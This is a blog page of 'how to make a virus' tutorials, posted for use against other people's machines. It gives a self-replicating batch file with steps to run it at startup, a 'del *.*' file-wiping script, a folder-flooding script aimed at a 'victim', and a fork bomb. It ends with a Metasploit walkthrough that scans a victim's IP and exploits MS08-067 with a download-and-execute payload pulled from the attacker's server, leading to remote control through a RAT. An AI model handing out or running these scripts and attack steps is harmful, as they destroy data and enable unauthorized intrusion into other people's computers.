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Wednesday 13 May 2015

Overloading Memory-How To Make Virus

Posted by SHeeraz Ali 
Overloading Memory

Batch file is the name given to a type of script file, a text file containing a series of commands to be executed by the command interpreter.
A batch file may contain any command the interpreter accepts interactively at the command prompt. A batch file may also have constructs (IF, GOTO, Labels, CALL, etc.) that enable conditional branching and looping within the batch file.

Batch files usually have extensions : *.bat
They can be easily created in any word editor like notepad, wordpad.

In this tutorial you will learn how to create one of the simplest yet deadliest virus programs in the form of a batch file. This 6-line piece of code is so devastating, it can bring down a computer in a matter of seconds. (Well, at least it could a couple decades back)

Explanation: This batch file creates another batch file in the same directory, then copies itself into each of these newly created files. These files are then started up. Of course, they are identical so both of them start up again and repeat the process until the computer runs out of memory and crashes (or the antivirus catches it).

What this will do, if you leave it on long enough (about a couple minutes), is it will create so many copies of itself on the hard drive that all the empty space has been filled with these bats. Also it will use up all the computer's RAM as it is being told to run an ever-increasing number of the same processes, which over time gets too much for it to handle.
Depending on what runs out first hard disk space or RAM, the batch file may or may not cause permanent damage. In both cases, however, the computer will almost definitely crash, the operating system may be corrupted and on the next start up, you will be greeted by the well-known "Blue Screen Of Death". The only way to get rid of it will be to format your hard drive and re-install the operating system.

Further, we can have this beautiful file executed at startup, as a surprise for the unfortunate user who will happen to start the computer the next time.

NOTE: I cannot stress this enough- This is not a game. This tutorial is very dangerous (if you do it incorrectly) and for your own sake should never be actually performed. On execution, the computer will stop responding immediately and if the plug is not pulled off within 4-5 seconds (the program cannot be stopped after starting), there is a possibility of complete data loss and corruption of the hard drive.
With that out of the way, Here's how to do it :

Step 1 : Open a word editor like Notepad.

Step 2 : Type in the following code ->

@echo off
SET /A x=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat

Step 3 :Save the File as "damage.bat" (or whatever) and we're done!

(Optional) Step 4 :To make this file execute automatically at startup, Do the following. Create a shortcut of the damage.bat file by right clicking on it. Open the start menu, In programs Open Startup folder and simply drag or cut-paste the shortcut into this folder. The virus will break loose the next time the computer is started up.

P.S. - If that sounded too easy to be true, it is. The thing is, this example is so basic it is known to 100% of all the antivirus softwares. Chances are if you do have even a really bad and outdated antivirus, it will most probably not even let you create this file or immediately delete it, as I experienced with my AVAST antivirus. But there are ways to get around this, which we'll look into later on.

Overloading Memory-How To Make Virus

Wiping Out Memory-How To Crush Someone Computer

Posted by SHeeraz ALi 
Wiping Out Memory-How To Crush Someone Computer
How To Make Overloading Memory VIRUS 

In the previous tutorial, we overloaded the computer's memory, now we're going to wipe it all off. :-) This is a short and easy one.

Step 1: Open up Notepad.

Step 2: Type : del *.*

Step 3: Save it as a .bat file(For eg. Any_name.bat)

That's it! In this command, "del" is for deleting and the following text specifies the file to be deleted(Along with Directory).
Putting a '*' before the '.' means that no matter what the file's name is, it will be deleted. Putting a '*' after the '.' means that no matter what the file's type is, it will be deleted. Combined, it means that whatever file is encountered by the .Bat it will be wiped off completely. In quite a lot of programming languages, a "*" signifies "all" or "everything".

Again, this is quite dangerous to a system without antivirus as nothing will be left when this guy is done. Although technically, the system will crash as soon as the .bat file encounters some vital file required for the computer to work hence crashing it.
On an average system this should take less than a minute to do it's thing after which Windows will be corrupted and the only way to use the computer, would be to install the operating system again.

Wiping Out Memory-How To Crush Someone Computer

Folder Blaster-Make Virus

Posted by SHeeraz ALi 
Folder Blaster-Make Virus
Flooder blaster
Most of the commands we use to make batch files are actually the same commands first implemented in MS-DOS (An ancient microsoft OS). These DOS(Disk Operating System) commands can also be used in the command prompt window. Whatever your batch file does, you can do it through the command line interface (CLI). 
Start "Run", or hit [Windows key + R]. Type "cmd", and you're presented with the CLI. You can type "help" to get a list of commonly used commands and their functions. I recommend you try out each and every single command you can find. Hacking is getting more and more user friendly everyday, CLIs are being replaced by GUIs (Graphical User Interfaces) - meaning in most places you won't have to actually type in the commands, you can just select an option and press a button. But as of now, this is a work in progress. With more advanced hacking techniques, specially the ones that involve using BackTrack tools, you will find that majority of the hacks are still done through the CLI (More on this, later). 

You will soon be learning how to hack into a remote computer and get the CMD window of the victim's computer. Hence, I recommend getting used to the CLI, as soon as possible, as much as possible. Before getting to the code, let's take a look at a couple of commands. 

md - (or mkdir) - Make Directory. This command is used to create a directory (a folder). The command: 
md abcd 
..will create a folder in the current directory named "abcd". 

cd - Change Directory. This command is used to change the current directory. The following command: 
cd C:\\ 
..will take the program (your batch file) to the Root folder and: 
cd C:\\Users 
..will take you to the folder called Users in the C drive. You can change where you "mkdir" by using "CD". (You can now create folders in any directory you like) 

Here we've got the Folder Blaster virus. Again, this one's fairly easy to understand. What we're doing below is creating a bunch of folders, opening them all at once and keeping them open, effectively hogging a big portion of the screen and memory causing the windows to lag, freeze up and sometimes crash. 

@echo off 
cd ./Desktop 
md 1 
md 2 
md 3 
md 4 
md 5 
md 6 
md 7 
md 8 
md 9 
md 0 
start 1 
start 2 
start 3 
start 4 
start 5 
start 6 
start 7 
start 8 
start 9 
start 0 
goto confirm 

So, we begin by turning off echo. Then we change the directory to Desktop. Now we create ten folders with names 0-9. We setup a label and start opening up all the 10 folders. Now the final statement causes an infinite loop. Of course, if the folder is already opened it will not be opened again. But the use of this infinite loop is if the user attempts to close the folder, the loop is still going on and it will send a message to open that folder again. So the victim will be stuck as every time s/he closes a folder it opens up again, eventually making them give up and restart the system.The above code can be made much shorter with the use of LOOPs, as discussed below. We start by creating a variable and setting it's value to 0. We use this variable as a check to let the computer know when to come out of the loop. Take a look at the code first: 

@echo off 
set /a i=0 
if %i%==10 goto end 
echo This is iteration %i%. 
set /a i=%i%+1 
goto loop 

"set" is used to define and initialize a variable. Here we create a variable called "i" and set it's value to zero. After setting up a label, we check if the value of the variable "i" (given by %i%) is equal to 10, and if it is we "goto" the label end (the program ends when this happens). Now we "echo" (send a message) to notify the user which iteration is currently running. In the next step we increment the value of "i" by one and then go back to the "if" statement. 

So the loop runs ten times (0-9), and then stops. The above was not a virus, but a simple program. Earlier, I told you that the above Folder Blaster virus code can be made shorter by using loops. You know how to make the virus, and now you know how to use loops. Combining the two of them, I leave as an exercise for the wannabe hacker. (HINT: See the folder names up top going from 0-9 ? You can just replace them with %i% in the above loop.)

Folder Blaster-Make Virus

Fork Bomb-Crush Computer Very Badly With a Single Notepad File

Posted by Sheeraz Ali 
Fork Bomb-Crush Computer Very Badly With a Single Notepad File
Crush Computer With Notepad File 

Another classic, A fork bomb is the equivalent of a DOS attack on your own system. It aims at depriving the system off it's Random access memory, leaving none for vital functions required to keep the systems running, hence crashing it. Just 5 characters long, the fork bomb is not Deadly to a computer, Just annoying.

As with the previous batch file virus tutorials, all you need to do is open up notepad, type and save the following code as a batch file, that is with extension .bat


(That was it.)
Technically, the above 5 characters are short for the following more comprehensible code :

start %0
goto s

Here, the first line creates a sort of checkpoint called 's'. It can be used to bring the programs pointer to a specific command, as is done here by using 'goto' in the last statement. '%0' is actually the name of the .bat file itself. So every time the loop is run another instance of the same program is called and then both of them run together, to again duplicate themselves.
If that seems too simple to cause any trouble, read on.

Every program doubling itself is a form of exponential growth. After one iteration of the loop, two programs are created. After another cycle, each of those two create another two for a total of four same programs. After 10 iterations we have 2^10 = 1024 programs. After 100 iterations we have 2^100 = 1.267 nonillion, a number so big you don't even know what 'nonillion' is (It's 10^30).

Even with today's CPUs and RAMs being in the Giga Range(Ghz and Gb), the first program will probably not even complete 50 iterations before running out of memory. Mind you, every iteration would hardly take a few milliseconds , so running this file will almost definitely crash your computer.

Fork Bomb-Crush Computer Very Badly With a Single Notepad File

How To Hack Computer With IP Address

How To Hack Computer With IP Address
How To Hack Computer With IP Address

First of all you need target IP of your victim.
Then open Metasploit Console & type db_create.

[Usage: This will create or connect you to a(your) database.]

Once you do that type Nmap.

[Usage: This will load Nmap in Metasploit Console]

Next you need to type db_nmap -sT -sV <target IP>

[This will scan OS, Ports, and Services running on the victim's computer.]

Wait for 5 minutes to complete the scan.

Once done, Note down the OS, Ports, and Services running on the slave's computer.

Now it's time to exploit the victim's machine.

Exploit depends on the OS, Ports, and Services running on the slave's computer.

So, you're lucky if you get OS WIN XP or 2000 because it's easy to exploit them.

No matter whether they are protected by a firewall or not.


Windows 2000 (all versions SP1, SP2, SP3, SP4)

Windows XP (all versions SP1, SP2, SP3)

Type show exploits

[Usage: This will show all the exploits in its database.]

Next you need to type use windows/smb/ms08_067_netapi

[Usage: This will select the exploit windows/smb/ms08_067_netapi]

Now Type show targets

[Usage: This will show all targets by exploit]

Now Type set target 0

[Usage: This will set target to 0 specified]

Then type show payloads

[Usage: This will bring up all the payloads]

Next type set payload windows/download_exec

[Usage: This will set the payload as windows/download_exec]

Then Type show options

[Usage: This will show all options in the exploit & payload]

In window you will see many options, in which you need to

Fill only two options RHOST & URL.

Type set RHOST < >

[Usage: This will set RHOST (victim's ip) to]

Next Type set URL

[Usage: This will set the URL to your direct server link.]

Finally you need to type exploit

[Usage: This will launch the exploit & your slave will be infected.]

You can now control your slave with a RAT. (Remote administration tool.)

So, any versions of Win 2000-XP can be exploited easily.

You can use the command db_autopwn –p –t –e.

In most cases you get a shell!

Now the final question - how to change the shellcode above to get access to someone's 

Windows 7 or 8? 

How To Hack Computer With IP Address

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